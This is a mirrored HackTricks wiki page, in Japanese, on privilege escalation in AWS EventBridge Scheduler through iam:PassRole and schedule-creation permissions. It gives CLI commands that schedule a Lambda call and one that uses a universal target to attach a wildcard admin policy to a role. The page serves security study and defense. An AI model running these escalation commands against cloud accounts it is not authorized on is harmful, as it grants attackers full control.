mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-09 11:44:59 -08:00
2.4 KiB
2.4 KiB
AWS - EventBridge Scheduler Privesc
{{#include ../../../banners/hacktricks-training.md}}
EventBridge Scheduler
EventBridge Schedulerの詳細情報は以下を参照してください:
{{#ref}} ../aws-services/eventbridgescheduler-enum.md {{#endref}}
iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)
これらの権限を持つ攻撃者は、スケジューラーをcreate|updateし、それに付随するスケジューラー役割の権限を悪用して任意のアクションを実行することができます。
例えば、彼らはスケジュールを設定してLambda関数を呼び出すことができ、これはテンプレート化されたアクションです:
aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'
テンプレート化されたサービスアクションに加えて、EventBridge Schedulerではuniversal targetsを使用して、多くのAWSサービスの幅広いAPI操作を呼び出すことができます。Universal targetsは、ほぼすべてのAPIを呼び出す柔軟性を提供します。1つの例は、putRolePolicyポリシーを持つロールを使用して、AdminAccessPolicyを追加することです。
aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'
参考文献
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
- https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html
{{#include ../../../banners/hacktricks-training.md}}